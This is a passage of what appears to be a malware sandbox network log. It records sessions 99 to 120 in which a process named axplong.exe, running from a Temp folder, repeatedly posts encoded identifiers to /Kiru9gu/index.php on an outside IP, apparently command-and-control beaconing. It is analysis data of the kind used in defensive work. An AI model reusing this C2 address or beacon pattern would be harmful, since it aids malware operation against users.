Jul 2, 2024 00:26:45.380455971 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49837	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:45.393712044 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:46.084444046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49838	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:46.214929104 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:46.903192043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49839	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:47.327984095 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:48.034367085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49840	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:48.155848026 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:48.849637985 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49841	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:48.866648912 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:49.575920105 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49842	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:49.918056011 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:50.593754053 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:26:51.002363920 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:51.225699902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49843	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:51.351099014 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:52.073173046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49845	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:52.206867933 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:52.912319899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49846	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:52.925648928 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:53.633696079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49847	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:53.751408100 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:54.469104052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49848	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:54.481518984 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:55.194427967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49849	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:55.314095020 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:56.034920931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49850	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:56.046886921 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:56.745032072 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49851	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:56.860356092 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:57.561031103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	49852	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:57.572587967 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:58.286354065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	49853	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:58.406438112 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:59.105396986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49854	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:59.121865988 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:59.842470884 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	49855	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:59.957547903 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:00.665925980 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	49856	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:00.679071903 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:01.376832008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	49857	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:01.535721064 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:02.251619101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:27:02.443206072 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:02.666754961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	49858	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:02.797461033 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:03.503354073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	49859	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
